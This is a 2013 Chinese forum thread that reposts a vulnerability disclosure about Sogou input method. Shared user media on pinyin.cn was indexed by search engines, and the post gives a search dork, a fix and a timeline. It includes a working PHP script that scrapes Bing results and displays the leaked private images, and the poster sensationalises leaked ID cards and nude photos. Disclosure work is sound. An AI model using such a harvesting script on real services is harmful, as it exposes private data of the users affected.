扫描二维码关注官方公众号
123下一页
返回列表 发布新帖

搜狗输入法泄密事件,导致大量用户敏感信息泄露

3199 53
发表于 2013-6-5 18:29:01 | 查看全部 阅读模式

来吧兄弟,一起玩一起讨论!

您需要 登录 才可以下载或查看,没有账号?注册

×
本帖最后由 coldsea 于 2013-6-5 19:07 编辑

http://www.wooyun.org/bugs/wooyun-2013-023081
这是原帖,镇长@乌云

下午发现微博疯传搜狗输入法泄密事件,网友们已经挖出了大量敏感 & 成年内容!


其实该漏洞乌云很久之前就接到了白帽子的报告,并且及时通知了厂商,但问题至今未得到有效的处理。搜狗输入法可导致大量用户敏感信息泄露









甚至还有部分 成年 音频流出



漏洞证明:

为了验证方便,写了一段代码这个是针对bing的结果弄的。

直接这种形式去查看吧,挺方便还支持翻页哦亲!

<?php
set_time_limit(0);
$url = 'http://cn.bing.com/search?q=site%3apinyin.cn&qs=n&pq=site%3apinyin.cn&sc=0-4&sp=-1&sk=&first={ddddd}1&FORM=PERE';

$i = $_GET['i'];
        $api = file_get_contents(str_replace('{ddddd}',$i,$url));
        preg_match_all('/<a href=\"http:\/\/pinyin.cn\/([a-zA-Z0-9]+)?\"/',$api,$a);
        foreach($a[1] as $v) {
                $api = file_get_contents('http://pinyin.cn/'.$v);
                preg_match('/<a target="_blank" href="(.*?)">/',$api,$aa);
                if($aa) {
                        echo '<br>';
                        echo '<a target="_blank" href="http://pinyin.cn/'.$v.'">http://pinyin.cn/'.$v.'</a>:';
                        echo '<img class=\'round_img\' id=\'round_img\' src="'.$aa[1].'" border=0 max-width="210px" max-height="210px" />';

                }
}
修复方案:

短信发送时可以带一组查看码(如4位字符),打开链接时输入查看码才能查看内容。




漏洞详情披露状态:

2013-05-04:        细节已通知厂商并且等待厂商处理中
2013-05-05:        厂商已经确认,细节仅向厂商公开
2013-05-15:        细节向核心白帽子及相关领域专家公开
2013-05-25:        细节向普通白帽子公开
2013-06-04:        细节向实习白帽子公开
2013-06-05:        细节向公众公开

简要描述:

搜狗输入法信息发送过程存储了相对应的信息在云端,但由于相应配置及其他原因造成会话信息【图片、视频、音频】泄露。其中很多身份证、果照、还有检举信!!!

详细说明:

搜狗输入法信息发送过程存储了相对应的信息,由于不严谨造成信息被搜索引擎抓取。

Google或者bing:

输入关键词:site:pinyin.cn

[bing=3,700 条结果],[Google=约 1,120 条结果 ]

评论53

Geass-CCLv.9 发表于 2013-6-5 18:38:54 | 查看全部
{:1_81:}  无语了
回复 点赞

使用道具 举报

phoenixxLv.8 发表于 2013-6-5 18:48:24 | 查看全部
拒绝输入法联网。
回复 点赞

使用道具 举报

AOE青云Lv.6 发表于 2013-6-5 18:56:15 | 查看全部
{:7_748:},不是吧
回复 点赞

使用道具 举报

SuperEVALv.10 发表于 2013-6-5 18:56:25 | 查看全部
该文件已过期
回复 点赞

使用道具 举报

coldsea楼主Lv.8 发表于 2013-6-5 18:58:37 | 查看全部
Geass-CC 发表于 2013-6-5 18:38
无语了

{:7_857:}哈哈,你是不是也输入了照片啥的
回复 点赞

使用道具 举报

coldsea楼主Lv.8 发表于 2013-6-5 18:59:35 | 查看全部
phoenixx 发表于 2013-6-5 18:48
拒绝输入法联网。

come on 除非五笔输入法,拼音输入法联网绝对效率要高一大捷
回复 点赞

使用道具 举报

scorpinLv.8 发表于 2013-6-5 19:00:12 | 查看全部
我去,各种猛图。国人的东西以后真得慎重选择了……。
国产的软件能不用的尽量不要用。  详情 回复
发表于 2013-6-6 00:33
http://www.wooyun.org/bugs/wooyun-2013-023081  详情 回复
发表于 2013-6-5 19:02
回复 点赞

使用道具 举报

coldsea楼主Lv.8 发表于 2013-6-5 19:00:30 | 查看全部
AOE青云 发表于 2013-6-5 18:56
,不是吧

已经很火了
http://www.wooyun.org/bugs/wooyun-2013-023081
回复 点赞

使用道具 举报

欢腾的小螃蟹Lv.10 发表于 2013-6-5 19:17:15 | 查看全部
这也有啊{:7_714:}
回复 点赞

使用道具 举报

sexy8866Lv.5 发表于 2013-6-5 19:20:23 | 查看全部
什么情况啊?
回复 点赞

使用道具 举报

0west0Lv.10 发表于 2013-6-5 19:20:48 | 查看全部
怎么信息到处都不能得到保全呢
回复 点赞

使用道具 举报

sexy8866Lv.5 发表于 2013-6-5 19:23:13 | 查看全部
0west0 发表于 2013-6-5 19:20
怎么信息到处都不能得到保全呢

我看不懂啊
再来射一次
回复 点赞

使用道具 举报

sexy8866Lv.5 发表于 2013-6-5 19:23:20 | 查看全部
0west0 发表于 2013-6-5 19:20
怎么信息到处都不能得到保全呢

说什么啊
再来射一次
回复 点赞

使用道具 举报

queenLv.10 发表于 2013-6-5 19:33:33 | 查看全部
从来不用什么搜狗{:7_742:}
你以为就搜狗才这样么。  详情 回复
发表于 2013-6-6 00:32
回复 点赞

使用道具 举报

jackiechan@2Lv.2 发表于 2013-6-5 19:46:25 | 查看全部
搜狗还是可以的,不过一输入法搞什么语音,多媒体传送
多余东东一概不用
回复 点赞

使用道具 举报

8888331wLv.4 发表于 2013-6-5 19:46:42 | 查看全部
什么情况啊????{:7_725:}
回复 点赞

使用道具 举报

sgyanj_r4wLv.10 发表于 2013-6-5 19:47:31 | 查看全部
什么意思啊?我现在用的QQ拼音
回复 点赞

使用道具 举报

小三班 发表于 2013-6-5 19:47:59 | 查看全部
输入法还连个P网
回复 点赞

使用道具 举报

叶影漂泊Lv.6 发表于 2013-6-5 19:49:43 | 查看全部
{:7_714:} 这个。。。
回复 点赞

使用道具 举报

回复

您需要登录后才可以回帖 登录 | 注册

本版积分规则

淘宝小店

邀请码

VIP会员

微信客服

公众号

微信群

投诉/建议联系

support@gebi1.cn

未经授权禁止转载,复制和建立镜像,
如有违反,追究法律责任
  • 关注公众号
  • 添加微信客服
Copyright © 2001-2024 隔壁网 版权所有 All Rights Reserved. 粤ICP备14056481号-1
关灯 在本版发帖
扫一扫添加微信客服
返回顶部
快速回复 返回顶部 返回列表